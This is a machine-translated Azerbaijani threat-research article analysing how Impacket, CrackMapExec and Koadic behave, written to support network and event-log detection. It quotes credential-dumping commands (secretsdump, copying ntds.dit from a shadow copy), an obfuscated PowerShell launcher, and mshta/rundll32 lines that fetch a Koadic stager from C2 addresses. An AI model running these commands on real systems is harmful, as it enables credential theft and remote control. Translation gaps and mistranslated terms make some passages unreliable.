Korporativ sektorda hücumların sayı hər il artır: məsələn, 2016-cı ilə nisbətən və 2018-ci ilin sonunda — əvvəlki dövrlə müqayisədə. Əsas iş aləti Windows əməliyyat sistemi olanlar da daxil olmaqla. 2017-2018-ci illərdə APT Dragonfly, APT28, Avropa, Şimali Amerika və Səudiyyə Ərəbistanında hökumət və hərbi təşkilatlara hücumlar həyata keçirib. Bunun üçün üç vasitədən istifadə etdilər - , и . Onların mənbə kodu açıqdır və GitHub-da mövcuddur.
Qeyd etmək lazımdır ki, bu alətlər ilkin nüfuz üçün deyil, infrastruktur daxilində hücumun inkişafı üçün istifadə olunur. Hücumçular onlardan perimetrə nüfuz etdikdən sonra hücumun müxtəlif mərhələlərində istifadə edirlər. Yeri gəlmişkən, bunu aşkar etmək çətindir və çox vaxt yalnız texnologiyanın köməyi ilə və ya alətlər . Alətlər faylların ötürülməsindən tutmuş reyestrlə əlaqə saxlamağa və uzaq maşında əmrlərin yerinə yetirilməsinə qədər müxtəlif funksiyaları təmin edir. Şəbəkə aktivliyini müəyyən etmək üçün bu vasitələrin tədqiqatını apardıq.
Nə etməli idik:
- Hack alətlərinin necə işlədiyini anlayın. Təcavüzkarların nədən istifadə etməli olduqlarını və hansı texnologiyalardan istifadə edə biləcəklərini öyrənin.
- Hücumun ilk mərhələlərində informasiya təhlükəsizliyi vasitələri tərəfindən aşkarlanmayanları tapın. Kəşfiyyat mərhələsi ya hücum edənin daxili hücumçu olması, ya da təcavüzkarın infrastrukturda əvvəllər məlum olmayan qüsurdan istifadə etməsi səbəbindən atlana bilər. Onun hərəkətlərinin bütün zəncirini bərpa etmək mümkün olur, buna görə də sonrakı hərəkəti aşkar etmək istəyi yaranır.
- Müdaxilənin aşkarlanması alətlərindən yanlış pozitivləri aradan qaldırın. Unutmaq olmaz ki, yalnız kəşfiyyat əsasında müəyyən hərəkətlər aşkar edildikdə, tez-tez səhvlərə yol verilə bilər. Adətən infrastrukturda istənilən məlumatı əldə etmək üçün ilk baxışdan qanuni olandan fərqlənməyən kifayət qədər yollar mövcuddur.
Bu vasitələr təcavüzkarlara nə verir? Əgər bu, impaketdirsə, təcavüzkarlar perimetrə nüfuz etdikdən sonra hücumun müxtəlif mərhələlərində istifadə oluna bilən böyük modullar kitabxanası əldə edirlər. Bir çox alətlər Metasploit kimi Impacket modullarını daxildən istifadə edir. Əmrləri uzaqdan idarə etmək üçün dcomexec və wmiexec, Impacket-dən əlavə yaddaş hesablarını əldə etmək üçün secretsdump var. Nəticədə belə kitabxananın fəaliyyətinin düzgün aşkarlanması törəmələrin aşkarlanmasını təmin edəcəkdir.
CrackMapExec (və ya sadəcə CME) haqqında yaradıcılar bir səbəbdən "Powered by Impacket" yazdılar. Bundan əlavə, CME populyar ssenarilər üçün hazır funksionallığa malikdir: bu, parolların və ya onların hashlərinin əldə edilməsi üçün Mimikatz və uzaqdan icra üçün Meterpreter və ya Empire agentinin və göyərtədə Bloodhound-un tətbiqi.
Üçüncü seçim alətimiz Koadicdir. O, kifayət qədər təzədir, 25-ci ildə DEFCON 2017 beynəlxalq haker konfransında təqdim olunub və qeyri-standart yanaşmaya malikdir: HTTP, Java Script və Microsoft Visual Basic Script (VBS) vasitəsilə işləyir. Bu yanaşma torpaqdan kənarda yaşamaq adlanır: alət Windows-da qurulmuş bir sıra asılılıqlar və kitabxanalardan istifadə edir. Yaradıcılar onu COM Command & Control və ya C3 adlandırırlar.
ZƏRBƏ
Impacket-in funksionallığı AD daxilində kəşfiyyatdan və daxili MS SQL serverlərindən məlumatların toplanmasından tutmuş, etimadnamələrin əldə edilməsi üsullarına qədər çox genişdir: bu, SMB relay hücumudur və domendən istifadəçi parolu heşlərini ehtiva edən ntds.dit faylını əldə etməkdir. nəzarətçi. Impacket həmçinin dörd müxtəlif üsuldan istifadə edərək əmrləri uzaqdan yerinə yetirir: WMI vasitəsilə, Windows planlaşdırıcısını, DCOM və SMB-ni idarə etmək üçün xidmətdir və bunun üçün ona etimadnamə lazımdır.
gizli zibillik
Gizli zibilliyə nəzər salaq. Bu, həm istifadəçi maşınlarını, həm də domen nəzarətçilərini hədəf ala bilən moduldur. Bununla siz LSA, SAM, SECURITY, NTDS.dit yaddaş sahələrinin surətlərini əldə edə bilərsiniz, buna görə də onu hücumun müxtəlif mərhələlərində görmək olar. Modulun işində ilk addım SMB vasitəsilə autentifikasiyadır ki, bu da Pass the Hash hücumunu avtomatik həyata keçirmək üçün ya istifadəçinin parolunu, ya da onun hashını tələb edir. Sonra, Xidmətə Nəzarət Menecerinə (SCM) girişi açmaq və winreg protokolundan istifadə edərək reyestrə giriş əldə etmək tələbi gəlir, bunun vasitəsilə təcavüzkar onu maraqlandıran filialların məlumatlarını öyrənə və SMB vasitəsilə nəticələri əldə edə bilər.
Əncirdə. 1-də, winreg protokolundan istifadə edərkən LSA ilə qeyd açarı ilə girişin necə əldə edildiyini dəqiq görürük. Bunu etmək üçün opcode 15 - OpenKey ilə DCERPC əmrindən istifadə edin.
düyü. 1. Winreg protokolundan istifadə edərək qeyd defteri açarının açılması
Bundan əlavə, açarla giriş əldə edildikdə, dəyərlər opcode 20 ilə SaveKey əmri ilə saxlanılır. Impacket bunu çox xüsusi bir şəkildə edir. O, dəyərləri .tmp əlavə edilmiş 8 təsadüfi simvoldan ibarət sətir olan faylda saxlayır. Bundan əlavə, bu faylın sonrakı boşaldılması System32 kataloqundan SMB vasitəsilə baş verir (şək. 2).
düyü. 2. Uzaq maşından registr açarının alınması sxemi
Məlum olub ki, siz winreg protokolundan, konkret adlardan, əmrlərdən və onların sırasından istifadə edərək reyestrinin müəyyən filiallarına sorğu verməklə şəbəkədə bu cür fəaliyyəti aşkar edə bilərsiniz.
Həmçinin, bu modul Windows hadisələr jurnalında izlər buraxır, bunun sayəsində asanlıqla aşkar edilir. Məsələn, əmrin icrası nəticəsində
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCWindows Server 2016 jurnalında biz hadisələrin aşağıdakı əsas ardıcıllığını görəcəyik:
1. 4624 - Uzaqdan Daxil olma.
2. 5145 - winreg uzaq xidmətinə giriş hüquqlarının yoxlanılması.
3. 5145 - System32 qovluğunda fayla giriş hüquqlarının yoxlanılması. Faylın yuxarıda qeyd olunan təsadüfi adı var.
4. 4688 - vssadmin-i işə salan cmd.exe prosesinin yaradılması:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - əmrlə proses yaratmaq:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - əmrlə proses yaratmaq:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - əmrlə proses yaratmaq:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Bir çox istismardan sonrakı alətlər kimi, Impacket-in də uzaqdan əmrlərin icrası üçün modulları var. Biz sizə uzaq maşında interaktiv əmr qabığı verən smbexec-ə diqqət yetirəcəyik. Bu modul həmçinin parol və ya onun hash ilə SMB vasitəsilə autentifikasiya tələb edir. Əncirdə. 3 belə bir alətin işləmə nümunəsini görürük, bu halda bu, yerli idarəçi konsoludur.
düyü. 3. smbexec interaktiv konsolu
Doğrulamadan sonra smbexec-də ilk addım OpenSCManagerW(15) əmri ilə SCM-ni açmaqdır. Sorğu diqqətəlayiqdir: onun MachineName sahəsi DUMMY olaraq təyin edilmişdir.
düyü. 4. Xidmətə Nəzarət Menecerinin açılmasını tələb edin
Sonra, xidmət CreateServiceW (12) əmrindən istifadə edərək yaradılır. Smbexec vəziyyətində biz hər dəfə eyni komanda qurma məntiqini görə bilərik. Əncirdə. 5 yaşıl rəng əmrin dəyişməz parametrlərini, sarı - təcavüzkarın dəyişə biləcəyini göstərir. İcra olunan faylın adının, onun kataloqunun və çıxış faylının dəyişdirilə biləcəyini görmək asandır, lakin qalanını Impacket modulunun məntiqini pozmadan dəyişdirmək daha çətindir.
düyü. 5. Service Control Manager istifadə edərək xidmət yaratmaq üçün sorğu
Smbexec həmçinin Windows hadisələr jurnalında aydın izlər buraxır. ipconfig əmri ilə interaktiv əmr qabığı üçün Windows Server 2016 jurnalında biz hadisələrin aşağıdakı əsas ardıcıllığını görürük:
1. 4697 - xidmətin qurbanın maşınına quraşdırılması:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - 1-ci bəndin arqumentləri ilə cmd.exe prosesinin yaradılması.
3. 5145 - C$ kataloqunda __çıxış faylına giriş hüquqlarının yoxlanılması.
4. 4697 - Xidmətin qurbanın maşınına quraşdırılması.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - 4-ci bəndin arqumentləri ilə cmd.exe prosesinin yaradılması.
6. 5145 - C$ kataloqunda __çıxış faylına giriş hüquqlarının yoxlanılması.
Impacket hücum alətlərinin inkişafı üçün əsasdır. Windows infrastrukturunda demək olar ki, bütün protokolları dəstəkləyir və eyni zamanda öz xüsusiyyətlərinə malikdir. Burada xüsusi winreg sorğuları və əmrlərin xarakterik formalaşması ilə SCM API-nin istifadəsi, fayl adlarının formatı və SMB pay SYSTEM32.
CRACKMAPEXEC
CME aləti, ilk növbədə, təcavüzkarın şəbəkə daxilində irəliləmək üçün yerinə yetirməli olduğu gündəlik hərəkətləri avtomatlaşdırmaq üçün nəzərdə tutulmuşdur. Bu, bədnam Empire agenti və Meterpreter ilə birlikdə işləməyə imkan verir. Əmrləri görünməz şəkildə yerinə yetirmək üçün CME onları çaşdıra bilər. Bloodhound (ayrıca kəşfiyyat vasitəsi) istifadə edərək təcavüzkar aktiv domen administratoru sessiyasının axtarışını avtomatlaşdıra bilər.
qanıq it
Bloodhound müstəqil bir vasitə kimi şəbəkə daxilində qabaqcıl kəşfiyyat aparmağa imkan verir. O, istifadəçilər, maşınlar, qruplar, sessiyalar haqqında məlumat toplayır və PowerShell skripti və ya binar kimi gəlir. LDAP və ya SMB-yə əsaslanan protokollar məlumat toplamaq üçün istifadə olunur. CME inteqrasiya modulu Bloodhound-u qurbanın maşınına yükləməyə, onu işə salmağa və icradan sonra toplanmış məlumatları qəbul etməyə imkan verir, bununla da sistemdəki hərəkətləri avtomatlaşdırır və onları daha az nəzərə çarpan edir. Bloodhound-un qrafik qabığı toplanmış məlumatları qrafiklər şəklində təqdim edir ki, bu da təcavüzkarın maşınından domen administratoruna qədər ən qısa yolu tapmağa imkan verir.
düyü. 6. Bloodhound interfeysi
Qurbanın maşınında işləmək üçün modul ATSVC və SMB istifadə edərək tapşırıq yaradır. ATSVC Windows Task Scheduler ilə işləmək üçün interfeysdir. CME şəbəkə üzərindən iş yerləri yaratmaq üçün NetrJobAdd(1) funksiyasından istifadə edir. CME modulunun göndərdiyi nümunə Şəkildə göstərilmişdir. 7: bu, cmd.exe əmrinə və XML formatında arqumentlər şəklində qarışıq koda zəngdir.
Şəkil 7. CME vasitəsilə tapşırıq yaratmaq
Tapşırıq icraya təqdim edildikdən sonra qurbanın maşını Bloodhound-un özünü işə salır və bunu trafikdə görmək olar. Modul standart qrupları, domendəki bütün maşın və istifadəçilərin siyahısını əldə etmək, SRVSVC NetSessEnum sorğusu vasitəsilə aktiv istifadəçi sessiyaları haqqında məlumat almaq üçün LDAP sorğuları ilə xarakterizə olunur.
düyü. 8. SMB vasitəsilə aktiv seansların siyahısının əldə edilməsi
Bundan əlavə, Bloodhound-un qurbanın maşınında audit aktivləşdirilərək işə salınması ID 4688 (proses yaradılması) və proses adı olan hadisə ilə müşayiət olunur. «C:WindowsSystem32cmd.exe». Burada diqqət çəkən komanda xətti arqumentləridir:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "enum_avproducts
enum_avproducts modulu funksionallıq və tətbiq baxımından çox maraqlıdır. WMI müxtəlif Windows obyektlərindən məlumat əldə etmək üçün WQL sorğu dilindən istifadə etməyə imkan verir ki, bu da əslində bu CME modulunun istifadə etdiyi şeydir. O, AntiSpywareProduct və AntiMirusProduct siniflərinə qurbanın maşınında quraşdırılmış mühafizə alətləri haqqında sorğular yaradır. Tələb olunan məlumatları əldə etmək üçün modul rootSecurityCenter2 ad sahəsinə qoşulur, sonra WQL sorğusu yaradır və cavab alır. Əncirdə. 9 belə sorğu və cavabların məzmununu göstərir. Bizim nümunəmizdə Windows Defender tapıldı.
düyü. 9. enum_avproducts modulunun şəbəkə fəaliyyəti
Tez-tez WQL sorğuları haqqında faydalı məlumat tapa biləcəyiniz hadisələrdə WMI (Trace WMI-Activity) yoxlaması söndürülə bilər. Amma əgər o, aktivləşdirilibsə, o zaman enum_avproducts skripti işə salınarsa, ID 11 olan hadisə saxlanacaq.O, sorğunu təqdim edən istifadəçinin adını və rootSecurityCenter2 ad məkanında adını ehtiva edəcək.
İstər xüsusi WQL sorğuları olsun, istərsə də LDAP və SMB-də çaşqınlıq və Bloodhound-a xas fəaliyyəti olan tapşırıq planlaşdırıcısında müəyyən növ tapşırıqların yaradılması olsun, CME modullarının hər birinin öz artefaktları var.
KOADİK
Koadic-in fərqli xüsusiyyəti Windows-da daxili JavaScript və VBScript tərcüməçilərinin istifadəsidir. Bu mənada o, torpaqdan kənarda yaşamaq tendensiyasını izləyir - yəni onun heç bir xarici asılılığı yoxdur və standart Windows alətlərindən istifadə edir. Bu, tam hüquqlu Command & Control (CnC) üçün bir vasitədir, çünki infeksiyadan sonra maşına nəzarət etməyə imkan verən "implant" quraşdırılır. Belə bir maşın, Koadik terminologiyasında, "zombi" adlanır. Qurbanın tərəfində tam işləmək üçün kifayət qədər imtiyazlar yoxdursa, Koadic İstifadəçi Hesabına Nəzarət bypass (UAC bypass) üsullarından istifadə edərək onları artırmaq imkanına malikdir.
düyü. 10. Koadic əmr qabığı
Qurban Command & Control server ilə əlaqə yaratmalıdır. Bunu etmək üçün o, əvvəlcədən hazırlanmış URI-yə daxil olmalı və mərhələlərdən birini istifadə edərək əsas Koadic gövdəsini almalıdır. Əncirdə. 11 mshta statoru üçün bir nümunə göstərir.
düyü. 11. CnC serveri ilə sessiyanın işə salınması
Cavabın WS dəyişəni ilə aydın olur ki, icra WScript.Shell vasitəsilə baş verir və STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE dəyişənləri cari sessiyanın parametrləri haqqında əsas məlumatları ehtiva edir. Bu, CnC serverinə HTTP bağlantısında ilk sorğu-cavab cütüdür. Sonrakı sorğular birbaşa çağırılan modulların (implantların) funksionallığı ilə bağlıdır. Bütün Koadic modulları yalnız aktiv CnC seansı ilə işləyir.
Mimikatz
CME Bloodhound ilə işlədiyi kimi, Koadic də Mimikatz ilə ayrıca proqram kimi işləyir və onu idarə etmək üçün bir neçə üsula malikdir. Aşağıda Mimikatz implantını yükləmək üçün sorğu-cavab cütü verilmişdir.
düyü. 12. Mimikatz-ı Koadiçə köçürün
Sorğuda URI formatının necə dəyişdiyini görə bilərsiniz. Seçilmiş modul üçün cavabdeh olan csrf dəyişəni üçün dəyəri var. Onun adına əhəmiyyət verməyin; hamımız bilirik ki, CSRF adətən başqa cür başa düşülür. Koadic-in eyni əsas orqanı cavab olaraq gəldi, Mimikatz ilə əlaqəli kod əlavə edildi. Bu olduqca böyükdür, ona görə də əsas məqamlara nəzər salaq. Budur base64 kodlu Mimikatz kitabxanası, onu yeridəcək seriallaşdırılmış .NET sinfi və Mimikatz-ı işə salmaq üçün arqumentlər. İcra nəticəsi şəbəkə üzərindən aydın mətnlə ötürülür.
düyü. 13. Mimikatz-ın uzaq bir maşında işləməsinin nəticəsi
Exec_cmd
Koadic də əmrləri uzaqdan yerinə yetirə bilən modullara malikdir. Burada biz eyni URI yaratma metodunu və tanış sid və csrf dəyişənlərini görəcəyik. exec_cmd modulu vəziyyətində, kod qabıq əmrlərini yerinə yetirməyə qadir olan gövdəyə əlavə olunur. Aşağıdakı kod CnC serverinin HTTP cavabında göstərilir.
düyü. 14. İmplant kodu exec_cmd
Tanış WS atributuna malik GAWTUUGCFI dəyişəni kodun icrası üçün tələb olunur. Onun köməyi ilə implant iki kod filialını emal edərək qabığı çağırır - çıxış məlumat axınının qaytarılması ilə shell.exec və geri qayıtmadan shell.run.
Koadic tipik bir alət deyil, lakin onun qanuni trafikdə tapıla biləcəyi öz artefaktları var:
- HTTP sorğularının xüsusi formalaşdırılması,
- winHttpRequests API istifadə edərək,
- ActiveXObject vasitəsilə WScript.Shell obyektinin yaradılması,
- böyük icra edilə bilən bədən.
İlkin əlaqə stasteri işə salır, ona görə də onun fəaliyyətini Windows hadisələri vasitəsilə aşkar etmək mümkün olur. Mshta üçün bu, başlanğıc atributu ilə prosesin yaradılmasını göstərən hadisə 4688:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Koadic işlədərkən, onu mükəmməl xarakterizə edən atributlarla digər 4688 hadisələri görmək olar:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Tapıntılar
Torpaqdan kənarda yaşamaq tendensiyası kibercinayətkarlar arasında populyarlıq qazanır. Onlar öz ehtiyacları üçün daxili Windows alətləri və mexanizmlərindən istifadə edirlər. Bu prinsipə əməl edən məşhur Koadic, CrackMapExec və Impacket alətlərinin APT hesabatlarında getdikcə daha tez-tez göründüyünü görürük. Bu alətlər üçün GitHub-da çəngəllərin sayı da artır, yeniləri meydana çıxır (indi onların minə yaxını var). Trend sadəliyinə görə populyarlıq qazanır: təcavüzkarların üçüncü tərəf alətlərinə ehtiyacı yoxdur, onlar artıq qurbanların maşınlarındadırlar və təhlükəsizlik tədbirlərindən yan keçməyə kömək edirlər. Biz şəbəkənin qarşılıqlı əlaqəsinin öyrənilməsinə yönəlmişik: yuxarıda təsvir edilən hər bir alət şəbəkə trafikində öz izlərini buraxır; onların ətraflı öyrənilməsi məhsulumuzu öyrətməyə imkan verdi onları aşkar etmək, bu da son nəticədə onlarla əlaqəli bütün kiber insidentlər zəncirinin araşdırılmasına kömək edir.
Müəlliflər:
- Anton Tyurin, Positive Technologies, PT Ekspert Təhlükəsizlik Mərkəzinin Ekspert Xidmətləri Departamentinin rəhbəri
- Eqor Podmokov, ekspert, PT Ekspert Təhlükəsizlik Mərkəzi, Positive Technologies
Mənbə: www.habr.com